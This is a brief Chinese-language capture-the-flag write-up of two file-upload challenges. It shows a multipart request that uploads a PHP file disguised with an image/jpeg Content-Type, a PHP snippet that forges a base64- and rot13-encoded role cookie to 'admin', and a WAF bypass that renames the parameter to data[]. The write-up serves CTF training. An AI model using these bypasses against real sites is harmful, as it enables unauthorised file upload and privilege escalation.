Do you know upload?
第三届百越杯上传小题:直接改Content-Type: image/jpeg文件名php都不用改,即可上传
------WebKitFormBoundarytJvTA9B9Lb4TVKYS
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
who are you?
第二届强网杯上传小题:提示Sorry. You have no permissions,发现cookie里有一个role=Zjo1OiJ0aHJmZyI7字段base64解开还有一层rot13。
<?php
// echo str_rot13(base64_decode('Zjo1OiJ0aHJmZyI7'));
$a = 's:5:"admin";';
echo base64_encode(str_rot13($a));
?>
修改为admin然后替换cookie,得到提示:
<!-- $filename = $_POST['filename']; $data = $_POST['data']; -->
</html>
POST发现尖括号被waf拦截,参数名使用data[]代替data绕过判断即可上传